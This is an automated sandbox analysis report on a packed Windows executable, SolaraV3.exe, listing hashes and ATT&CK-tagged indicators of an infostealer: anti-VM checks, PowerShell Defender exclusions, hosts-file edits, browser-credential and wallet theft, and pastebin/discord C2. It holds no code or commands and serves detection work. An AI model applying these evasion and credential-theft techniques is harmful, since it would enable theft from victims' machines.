fab1dac490d27a14ae7ddde7c9837b64dfb84e28e6d6b4a6f650f6aff3d5b350

Analysis

max time kernel
133s
max time network
135s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-01-2025 17:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SolaraV3.exe
Size

10.0MB
MD5

c842c92e0f6c35fac35311e609b89f0b
SHA1

db58748fac5372dc4648a08765352cfc6dad59ef
SHA256

fab1dac490d27a14ae7ddde7c9837b64dfb84e28e6d6b4a6f650f6aff3d5b350
SHA512

4353cb9463b1eb6db6288b1add399d5f05858833bf72d04c7bc70270602019eb7134f55a0e44cbc92fe0d27ef519726f09f3f0621d05c07f3e99a884ede07804
SSDEEP

196608:vGD+kdlYvI3SnGK2Fjtwkvi3xPQDwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNp:u5rM9j2FjWkIowIHL7HmBYXrYoaUNp

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer themida trojan upx

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Solara.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2936	powershell.exe
452	powershell.exe
3504	powershell.exe
836	powershell.exe
3708	powershell.exe
4328	powershell.exe
964	powershell.exe
3596	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	SolaraV3.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0"	MicrosoftEdgeUpdate.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Solara.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Solara.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	msedgewebview2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	bound.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	msedgewebview2.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4748	cmd.exe
2604	powershell.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 20 IoCs

pid	Process
2452	bound.exe
4036	rar.exe
900	MicrosoftEdgeWebview2Setup.exe
2376	MicrosoftEdgeUpdate.exe
1920	MicrosoftEdgeUpdate.exe
3708	MicrosoftEdgeUpdate.exe
5040	MicrosoftEdgeUpdate.exe
4776	MicrosoftEdgeUpdate.exe
3016	MicrosoftEdgeUpdate.exe
3148	MicrosoftEdge_X64_132.0.2957.115.exe
216	setup.exe
396	setup.exe
1576	MicrosoftEdgeUpdate.exe
2380	Solara.exe
4836	msedgewebview2.exe
4880	msedgewebview2.exe
2268	msedgewebview2.exe
3172	msedgewebview2.exe
224	msedgewebview2.exe
4848	msedgewebview2.exe

Loads dropped DLL 39 IoCs

pid	Process
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
3616	SolaraV3.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
4836	msedgewebview2.exe
4880	msedgewebview2.exe
4836	msedgewebview2.exe
4836	msedgewebview2.exe
4836	msedgewebview2.exe
2268	msedgewebview2.exe
3172	msedgewebview2.exe
2268	msedgewebview2.exe
224	msedgewebview2.exe
3172	msedgewebview2.exe
224	msedgewebview2.exe
4848	msedgewebview2.exe
2268	msedgewebview2.exe
2268	msedgewebview2.exe
2268	msedgewebview2.exe
2268	msedgewebview2.exe
4848	msedgewebview2.exe
4848	msedgewebview2.exe
4836	msedgewebview2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/2380-594-0x0000000180000000-0x0000000181103000-memory.dmp	themida
behavioral2/memory/2380-595-0x0000000180000000-0x0000000181103000-memory.dmp	themida
behavioral2/memory/2380-593-0x0000000180000000-0x0000000181103000-memory.dmp	themida
behavioral2/memory/2380-596-0x0000000180000000-0x0000000181103000-memory.dmp	themida
behavioral2/memory/2380-762-0x0000000180000000-0x0000000181103000-memory.dmp	themida
behavioral2/memory/2380-793-0x0000000180000000-0x0000000181103000-memory.dmp	themida
behavioral2/memory/2380-897-0x0000000180000000-0x0000000181103000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Solara.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
86	pastebin.com
87	pastebin.com
113	pastebin.com
32	discord.com
33	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
30	ip-api.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Checks system information in the registry 2 TTPs 10 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4744	tasklist.exe
4108	tasklist.exe
2868	tasklist.exe
1824	tasklist.exe
2476	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4328	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2380	Solara.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023bbe-22.dat	upx
behavioral2/memory/3616-26-0x00007FF9FFAA0000-0x00007FFA00105000-memory.dmp	upx
behavioral2/files/0x000a000000023bb0-29.dat	upx
behavioral2/memory/3616-31-0x00007FFA13800000-0x00007FFA13827000-memory.dmp	upx
behavioral2/files/0x000a000000023bbc-32.dat	upx
behavioral2/files/0x000a000000023bb7-50.dat	upx
behavioral2/files/0x000a000000023bb6-49.dat	upx
behavioral2/files/0x000a000000023bb5-48.dat	upx
behavioral2/files/0x000a000000023bb4-47.dat	upx
behavioral2/files/0x000a000000023bb3-46.dat	upx
behavioral2/files/0x000a000000023bb2-45.dat	upx
behavioral2/files/0x000a000000023bb1-44.dat	upx
behavioral2/files/0x000a000000023baf-43.dat	upx
behavioral2/files/0x000a000000023bc3-42.dat	upx
behavioral2/files/0x000a000000023bc2-41.dat	upx
behavioral2/files/0x000a000000023bc1-40.dat	upx
behavioral2/files/0x000a000000023bbd-37.dat	upx
behavioral2/files/0x000a000000023bbb-36.dat	upx
behavioral2/memory/3616-33-0x00007FFA16BC0000-0x00007FFA16BCF000-memory.dmp	upx
behavioral2/memory/3616-56-0x00007FFA0EB40000-0x00007FFA0EB6B000-memory.dmp	upx
behavioral2/memory/3616-58-0x00007FFA0DF20000-0x00007FFA0DF39000-memory.dmp	upx
behavioral2/memory/3616-60-0x00007FFA0DEF0000-0x00007FFA0DF15000-memory.dmp	upx
behavioral2/memory/3616-62-0x00007FF9FF080000-0x00007FF9FF1FF000-memory.dmp	upx
behavioral2/memory/3616-64-0x00007FFA0DED0000-0x00007FFA0DEE9000-memory.dmp	upx
behavioral2/memory/3616-66-0x00007FFA12550000-0x00007FFA1255D000-memory.dmp	upx
behavioral2/memory/3616-68-0x00007FFA0A1C0000-0x00007FFA0A1F3000-memory.dmp	upx
behavioral2/memory/3616-73-0x00007FF9FEFB0000-0x00007FF9FF07E000-memory.dmp	upx
behavioral2/memory/3616-76-0x00007FFA13800000-0x00007FFA13827000-memory.dmp	upx
behavioral2/memory/3616-75-0x00007FF9FEA70000-0x00007FF9FEFA3000-memory.dmp	upx
behavioral2/memory/3616-72-0x00007FF9FFAA0000-0x00007FFA00105000-memory.dmp	upx
behavioral2/memory/3616-78-0x00007FFA14D30000-0x00007FFA14D44000-memory.dmp	upx
behavioral2/memory/3616-81-0x00007FFA0EB30000-0x00007FFA0EB3D000-memory.dmp	upx
behavioral2/memory/3616-80-0x00007FFA0EB40000-0x00007FFA0EB6B000-memory.dmp	upx
behavioral2/memory/3616-84-0x00007FFA0DF20000-0x00007FFA0DF39000-memory.dmp	upx
behavioral2/memory/3616-85-0x00007FFA0E820000-0x00007FFA0E8D3000-memory.dmp	upx
behavioral2/memory/3616-121-0x00007FFA0DEF0000-0x00007FFA0DF15000-memory.dmp	upx
behavioral2/memory/3616-143-0x00007FF9FF080000-0x00007FF9FF1FF000-memory.dmp	upx
behavioral2/memory/3616-276-0x00007FFA0A1C0000-0x00007FFA0A1F3000-memory.dmp	upx
behavioral2/memory/3616-285-0x00007FF9FEFB0000-0x00007FF9FF07E000-memory.dmp	upx
behavioral2/memory/3616-352-0x00007FF9FEA70000-0x00007FF9FEFA3000-memory.dmp	upx
behavioral2/memory/3616-369-0x00007FF9FF080000-0x00007FF9FF1FF000-memory.dmp	upx
behavioral2/memory/3616-376-0x00007FFA0EB30000-0x00007FFA0EB3D000-memory.dmp	upx
behavioral2/memory/3616-363-0x00007FF9FFAA0000-0x00007FFA00105000-memory.dmp	upx
behavioral2/memory/3616-445-0x00007FF9FFAA0000-0x00007FFA00105000-memory.dmp	upx
behavioral2/memory/3616-459-0x00007FFA0E820000-0x00007FFA0E8D3000-memory.dmp	upx
behavioral2/memory/3616-462-0x00007FFA16BC0000-0x00007FFA16BCF000-memory.dmp	upx
behavioral2/memory/3616-465-0x00007FFA0DEF0000-0x00007FFA0DF15000-memory.dmp	upx
behavioral2/memory/3616-464-0x00007FFA0DF20000-0x00007FFA0DF39000-memory.dmp	upx
behavioral2/memory/3616-463-0x00007FFA0EB40000-0x00007FFA0EB6B000-memory.dmp	upx
behavioral2/memory/3616-461-0x00007FFA13800000-0x00007FFA13827000-memory.dmp	upx
behavioral2/memory/3616-460-0x00007FF9FEA70000-0x00007FF9FEFA3000-memory.dmp	upx
behavioral2/memory/3616-455-0x00007FF9FEFB0000-0x00007FF9FF07E000-memory.dmp	upx
behavioral2/memory/3616-454-0x00007FFA0A1C0000-0x00007FFA0A1F3000-memory.dmp	upx
behavioral2/memory/3616-453-0x00007FFA12550000-0x00007FFA1255D000-memory.dmp	upx
behavioral2/memory/3616-451-0x00007FF9FF080000-0x00007FF9FF1FF000-memory.dmp	upx
behavioral2/memory/3616-458-0x00007FFA0EB30000-0x00007FFA0EB3D000-memory.dmp	upx
behavioral2/memory/3616-457-0x00007FFA14D30000-0x00007FFA14D44000-memory.dmp	upx
behavioral2/memory/3616-452-0x00007FFA0DED0000-0x00007FFA0DEE9000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\he.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\nn.pak	setup.exe
File opened for modification	C:\Program Files\MsEdgeCrashpad\throttle_store.dat	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Trust Protection Lists\Mu\TransparentAdvertisers	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedgewebview2.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\vulkan-1.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\id.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\ne.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\hu.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Installer\setup.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\qu.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\identity_proxy\beta.identity_helper.exe.manifest	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Trust Protection Lists\Sigma\Advertising	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\sr.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\lo.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\fr.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Trust Protection Lists\Sigma\Entities	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Trust Protection Lists\Sigma\Staging	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\notification_helper.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\ar.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\gu.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\BHO\ie_to_edge_stub.exe	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\vcruntime140_1.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\eventlog_provider.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\qu.pak	setup.exe
File opened for modification	C:\Program Files\MsEdgeCrashpad\throttle_store.dat	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\af.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\fr.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Trust Protection Lists\Mu\CompatExceptions	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\ms.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\pa.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedge_100_percent.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\dual_engine_adapter_x64.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\hu.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\identity_proxy\resources.pri	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Trust Protection Lists\manifest.json	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Trust Protection Lists\Mu\Advertising	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\km.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedge_200_percent.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedge_proxy.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\webview2_integration.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Trust Protection Lists\Mu\Social	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\kok.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\edge_feedback\mf_trace.wprp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Locales\fi.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\lt.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedge.dll.sig	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\notification_helper.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedge_elf.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\show_third_party_software_licenses.bat	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\pl.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\Trust Protection Lists\Sigma\Other	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\identity_proxy\win11\identity_helper.Sparse.Dev.msix	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\gd.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\lo.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedge.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\msedge_100_percent.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\gu.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\resources.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\VisualElements\LogoDev.png	setup.exe
File opened for modification	C:\Program Files\MsEdgeCrashpad\settings.dat	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\identity_proxy\win11\identity_helper.Sparse.Canary.msix	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Locales\nb.pak	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeWebview2Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3708	MicrosoftEdgeUpdate.exe
3016	MicrosoftEdgeUpdate.exe
3916	cmd.exe
432	PING.EXE
1576	MicrosoftEdgeUpdate.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4656	cmd.exe
900	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3060	WMIC.exe
5048	WMIC.exe
4248	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedgewebview2.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2568	systeminfo.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133820422195997969"	msedgewebview2.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	MicrosoftEdgeUpdate.exe
